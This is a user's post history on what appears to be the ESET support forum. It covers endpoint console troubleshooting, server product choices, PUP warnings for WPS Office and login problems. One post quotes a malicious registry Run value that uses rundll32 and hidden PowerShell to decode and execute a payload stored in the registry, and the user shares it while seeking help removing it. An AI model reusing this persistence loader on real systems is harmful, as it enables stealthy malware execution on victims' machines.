Everything posted by Carl S

  1. Re: 3, I don't have the management agent installed on that computer yet. Do I need to install that first? Seems like just to see it in the list I wouldn't have to do that. I saw all my other items like network printers, and bridge routers as "Rogue" at first. Seems like it should at least find it even if it isn't in there. But regardless, I should just go to the server itself and install the management software, and it should make it start showing up? Ours is supposed to be "Advanced" so, I think it's supposed to include the server(s).
  2. Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.
  3. We have EES installed on all the client desktop machines, but also have servers running. Read this: https://support.eset.com/en/kb2299-which-eset-security-solution-should-i-install-on-a-server
     1) One server has Exchange on it, but it is not our primary Exchange (which we have moved to Office 365 in the cloud), but our old Exchange which we have no new mail coming in, but occasionally need to connect to because it does have some old emails we need to retrieve on occasion for legacy reasons. It also has a SQL server instance on it. Is the Mail Security for Exchange Server the option still?
     2) The other server has IIS and acts as a file server. I am assuming the ESET File Security for Windows Server is appropriate for it. That is the machine I currently have ESMC installed.
     3) I do not see the first server in the list of computers in ESMC. So, I tried to manually add it by clicking Add New at the bottom of the computer listing in ESMC, I get the message: Some issues occurred during adding computers. FAIL> XXXXX.XX.local (Duplicity on server)
  4. Hi Marcos, here is the attachment. I removed the value of the authHost line. But other than that, everything else is the same. FWIW, I have no new detections since the 4th. 10485-baker01-ees_logs.zip
  5. I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.
  6. Marcos, I re-ran the collector on a whim, and this time, it worked. I now have the zip file ready.
  7. Am I deleting the whole key / value pair or the value and leaving the key?
  8. Hmm. I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."
  9. Working on this. I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent. Now up and running again, and will get the logs. (OK, it's collecting right now.) It's been years since I've submitted these types of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.
  10. The suspicious part seems to be:
      key: authHost
      value: rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))
  11. OK, found it by navigating to it. Could not get search to work. In the meantime, I have ESET client issues on that machine, probably due to my own fault.
  12. Duh, didn't catch that, I just cut and pasted. Thanks.
  13. When I search for that key I don't find it in regedit.
  14. This keeps showing up in one of our client machines in registry with the Registry scanner:
      Detection engine 20939 (20200303) : Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8
      \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run
      The ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this? Or what else should I do next?
  15. After fifteen years of using various versions of ESET NOD32 on my home computers and small offices, I have been trying to use it to replace our previous solution at the office. Today, after having a computer that got rolled back before the install of ESET endpoint client on 2/27 due to becoming unresponsive, I now see that client computer twice in the list with two different names. Not totally sure which is the new one and which is the old instance. I decided what needs to happen is that one of them needs to be removed from the ESMC. Is that right? In the ESMC, when I click on it and choose delete, it tells me there are three steps that must be completed. 1) Reset Endpoint Settings. 2) Stop computer management. 3) Remove computer from database. Since I didn't do 1 and 2 before reverting it, what should I do? If I send the instructions to the phantom one, will it affect the new one with the same IP but slightly different name? None of these instructions seem to really make sense in light of the situation I find myself in. I realize I might have done this differently, but I wasn't thinking of the impact this might have had on ESET when I was rolling it back.
  16. No, no other web sites have this problem, only this forum, but I tried it with multiple browsers and computers, all had the same problem. I have since changed authorization to use Facebook to login. I don't have this problem with it (although I really didn't want to connect using Facebook). It was only when using email and password that I have the problem. Before using the Facebook login, I was having to reset my password each time I returned to the ESET forum site.
  17. As an FYI, the online cybersecurity training that comes with ESS has a link to a page called "Take away PDF of tips and tricks." If you click on that link, it opens a pop-up window in the browser, but the server responds with error 404. The missing file is https://www.eset.com/us/resources/netropolis/embeds/ESETCybersecurityEducationTips.pdf
  18. Yes, if you read my post to itman, you'll see that as part of the debugging of version 9, which was having problems starting the EGUI both from the start menu as well as displaying ESS in the system tray, I had added EGUI to the start menu. After upgrading to version 10, this addition remained. I had added it by putting a shortcut to EGUI.exe in the folder C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. While that didn't work for version 9 (about 2/3 of the time I could not get to the GUI), once I had upgraded to 10, I was now getting the UI to pop up every time. I had forgotten that this was something we'd tried under version 9. When I removed it from that startup directory yesterday, the problem was resolved.
  19. Nope, but that got me thinking! If you'll look at my original post, one of the problems I had previously was that the ESET icon was not starting at all and not appearing in the system tray. I have a vague recollection that one of the things attempted to get it to go was adding it manually to one of the autostart places on the computer. That didn't work, though. Now, I'm thinking I never removed that and the startup is because I moved on to another strategy to get it to work. Eventually, moving to 10 seemed to get it to work. Now, I think I'm just seeing the results of my attempts to get version 9 to start at all. Sure enough I do Run|shell:startup and I see a shortcut to EGUI.exe dated 9/1/2016 from the height of my ESS 9 problems. Yep, that seems to be it. It was something leftover from earlier troubleshooting on version 9.
  20. Yes, I reinstalled version 10, it grabbed 10.0.390.0 during install, and after installing and rebooting, the ESET GUI stays open on logging in.
  21. KingSoft.D is the signature name by which ESET labels the unwanted program. It is the unique identifier that goes along with the definition in the ESET database that is used to name the PUP. The file in question is either the WPS Office installer or one of the files inside it or that it retrieves from the web during the installation process. Without further details, it's hard to tell exactly what file that is, and it may not be important. If the software is not working correctly, you might try installing and clicking Ignore instead of Clean if you're sure you really want WPS Office. You can probably see why it is considered a PUP at 1:18 in your video. At that point it is going out to a possibly shady ad-server on the web when you start the Office program. You can see this WPS Office is advertising supported (see the ad in the spreadsheet for WebStorm). That's why it's considered a PUP. It is getting advertising from the web, probably without fully warning the user before installation that it would be doing that. If you're OK with that type of behavior, just ignore the Win32/KingSoft.D PUP warnings during the installation. The URL warnings near the end of your video are a bit more problematic. It appears it is getting JavaScript from 1-1ads.com to load up ads in the software. Either that JavaScript is malicious or URL/domain have been identified as a problem. You can ignore them by whitelisting, but without further details, that would be a tough call for the user. My thought, if WPS Office works as expected, would be to let ESET block the URLs. You might want to turn off the notifications, though, as that might get annoying. There is an option in the settings called "Display only notifications requiring user interaction." That would let ESET silently block those URLs.
      If, however, WPS Office stops working as expected, then you may need to whitelist things so the software can work correctly, but I would not recommend that unless you're absolutely clear as to why ESET is blocking the ad URLs. You can ignore PUPs if you're personally OK with that. Ignore other ESET warnings at your own peril.
  22. Well, it's doing exactly what it's supposed to be doing. ESET is warning about files that may be "harmless" because you have PUP detection turned on. If you don't want it to be so aggressive and think that ESET's being too cautious, you can turn PUP detection off. Or, you can temporarily turn off ESET's detection while you install the software, and turn it back on later. It is clear that software from Kingsoft has been determined to be a Potentially Unwanted Program by ESET and/or some of its users. Otherwise, they wouldn't have named the detection after the software publisher itself. This doesn't mean it is a virus or trojan. It means that it does something else that many users don't like. It doesn't make sense for ESET to ignore this software for everyone, when you're the one who has determined this particular PUP is OK for you. I understand that. In the past, I have installed software that included adware, but I thought it was worth it to get the free software. I ignored ESET's PUP warning and still used the software. I do not expect ESET to remove that particular PUP detection for that item for everyone else, because for many it is indeed an unwanted program.
  23. Since it's called Kingsoft.D, I suspect that's not a false positive, but a PUP that was specifically found in WPS Office. If you don't like it, turn off PUP detection.
  24. I'm finding that the last few times I have tried to log in, the forum does not recognize my password. I am forced to reset my password every time. I change it, save it locally on my computer, and the next time I try to log into the forum, it says it is wrong. I am cutting and pasting, so I know it is right. I have tried multiple browsers with the same result. Anyone else experiencing this? I've resorted to just resetting my password each time I return here.